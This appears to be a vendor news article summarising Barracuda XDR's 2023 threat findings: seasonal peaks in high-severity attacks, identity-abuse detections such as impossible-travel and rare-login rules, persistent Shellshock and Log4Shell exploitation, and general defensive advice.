Barracuda XDR, along with its team of SOC analysts working around the clock, analysed nearly two trillion (1,640 billion) IT events to pinpoint tens of thousands of potentially high-risk security threats.
Defensive security technologies, including XDR, are designed to detect, notify, and block the enemy at the gate or in the early stages of an intrusion.
The attacks are prevented from being carried out fully — and this means that we don’t always know what the final intended payload might have been, such as ransomware.
According to Merium Khalid, Director, SOC Offensive Security, Barracuda XDR cybersecurity involves understanding attackers’ behaviour as well as their tools and tactics.
“Our data for 2023 shows that attackers are launching more high-severity attacks overall, and especially during times when IT teams are away from the workplace or less attentive, such as during holidays, outside working hours, during the night, and at weekends,” said Khalid
“Most attacks are trying to gain access to accounts by compromising identities. As attackers start to leverage AI tools to scale the volume, speed, and sophistication of attacks, these trends will escalate. Security teams need to ensure their security tools have the same power.” he said.
Overview of 2023: High-severity attack attempts increasing
High-severity detections during 2023 included 66,000 threats serious enough to be escalated to a SOC analyst for investigation, and a further 15,000 that required urgent and immediate defensive action.
There was also a steady rise in both threat categories throughout the year — peaking from October into November and December.
These months are the prime season for online shopping and festive holidays. Both factors are potentially highly attractive to attackers. The first because it offers a large pool of potential targets and opportunities, the second because it generally means IT teams are away from the workplace or less attentive.
There was a second, smaller, peak in June — which for many countries represents a key holiday month. Together, these results reinforce the findings we first reported in 2022 — that attackers seize the opportunity of people being away, busy, or distracted to launch more damaging and high-risk attacks.
Top XDR detections in 2023 center on identity abuse
The majority of the top 10 detections of 2023 are focused on some kind of identity compromise, resulting in a breached account. The detections that signpost this identity abuse include suspicious logins, brute force attacks, and attackers disabling multifactor authentication.
The uploading of a suspicious executable file could indicate attackers trying to move additional tools or malware from an external, adversary-controlled system such as a command-and-control server into a compromised account.
Endpoint threat detections involve a mechanism that triggers when Barracuda’s Managed XDR Endpoint Security spots a potential threat within a system, regardless of whether it successfully neutralised the threat or not.
It’s crucial to promptly notify the client in either scenario, as such detections necessitate a deeper investigation to uncover how the malicious file or process managed to execute initially.
This detection rule covers a wide spectrum of threats, including but not limited to harmless elements, potentially unwanted applications (PUA), adware, spyware, downloaders, cryptominers, malicious documents, exploits, viruses, worms, Trojans, backdoors, rootkits, information stealers, ransomware, interactive or remote shells, lateral movements, and more.
Suspicious superheroes, ghosts, and insomniacs — how AI tools spot intruders
Barracuda XDR features AI-powered detection rules, driven by our machine learning capabilities, designed to spot suspicious login activity that needs urgent evaluation.
The rules rely on algorithms and AI-based pattern analysis, which model a user’s baseline routine and immediately red flag anything that falls outside that.
- Suspicious superheroes — Impossible Travel detection rule
This detection rule catches attackers trying to log into a compromised account. When two logins are detected more than 1,000 km apart and the user would need to be travelling at more than 800 km/h — the average speed of an airplane — in order to do this, a security red flag is triggered. Furthermore, the detection checks the login isn’t associated with a VPN IP to remove any risk of a false positive.
To illustrate how this looks in practice, in one instance Barracuda XDR spotted a user logging in from Iowa in the U.S. and then in Moscow just over an hour later, seemingly covering 8,267 km at a speed of more than 7,000 km/hour.
- Ghosts — Rare User Log-in detection rule
This detection rule looks for unusual usernames appearing in the authentication logs. This helps to spot an intruder abusing the credentials for a dormant or inactive user, perhaps because the user has left the organisation, or a username that falls out of the organisation naming schema.
Threat actors will also try to create new users as a means of persistence, and this will be flagged as an unknown user by the detection rule.
- Insomniacs — Rare Hour for User detection rule
This detection rule looks for a user logging in at a time of day that is unusual for them. This can be due to someone in a different time zone trying to access the compromised account. In addition, unauthorised user activity often takes place outside standard business hours.
Network Traffic Detections
Barracuda XDR includes a sophisticated, multilayered Intrusion Detection System (IDS) that scrutinises traffic traversing a client’s network via a SPAN (mirror) port.
This IDS serves as a vigilant guardian, pinpointing both suspicious and potentially harmful activities that might appear legitimate but are linked to recognised malware, cyberattacks, and various security threats permeating your network. A significant portion of these threats are automated, executed en masse against networks.
Analysis of the leading IDS detections in 2023 reveals a persistent trend: Attackers consistently exploit longstanding critical vulnerabilities and weaknesses that have yet to be addressed through patching. This highlights the critical need for continuous vigilance and updates to network security measures.
Shellshock is a 10-year-old collection of bugs that continues to rank among the top 10 detections detected by Barracuda’s integrated IDS. The fact that Shellshock attacks remain so prevalent suggests that attackers know there are still many unpatched systems out there.
Reports suggest that Shellshock is being used by attackers to launch distributed denial of service (DDoS) attacks and to target vulnerable interconnected systems that are interconnected using bots and botnets.
Two years after the Log4Shell vulnerability in the open-source Java-based Log4j logging utility was disclosed, exploits against the bug also remain common. This could reflect the fact that Log4j is so deeply embedded in applications and other software that many organisations may not even know it is there — and vulnerable instances could be tricky and time-consuming to mitigate.
How To Stay Safe In A World of 24/7 Attacks
The security basics are more critical than ever. These should include robust authentication and access controls (multifactor authentication at a minimum and ideally moving to Zero Trust- based measures), a solid approach to patch management and data protection, and regular cybersecurity awareness training for employees.
However, in the face of a growing number of high-severity threats targeting an organiation’s expanding digital attack surface, and as attackers increasingly start to leverage AI for ever more sophisticated, faster, and targeted attacks, defenders will need to ensure their security tools have the same power. A multi-faceted, AI-based approach to protection that has several levels of increasingly deep detection and scrutiny is essential.
This should sit within an overall security framework that comprises robust next-generation security technologies, backed by expert analysis and 24/7/365 security monitoring to catch unknowns and anomalies that might otherwise slip through the net — and a SOC as a service to respond to and mitigate threats.
The findings from Barracuda’s 2023 XDR Threat Research highlight a concerning surge in high-severity threats, underscoring the evolving landscape of cybersecurity challenges.
As technology continues to advance, so do the tactics employed by malicious actors, emphasising the critical importance of robust cybersecurity measures.
It is imperative for organisations to remain vigilant, continuously adapt their defenses, and collaborate with industry experts to mitigate the risks posed by these increasingly sophisticated threats.
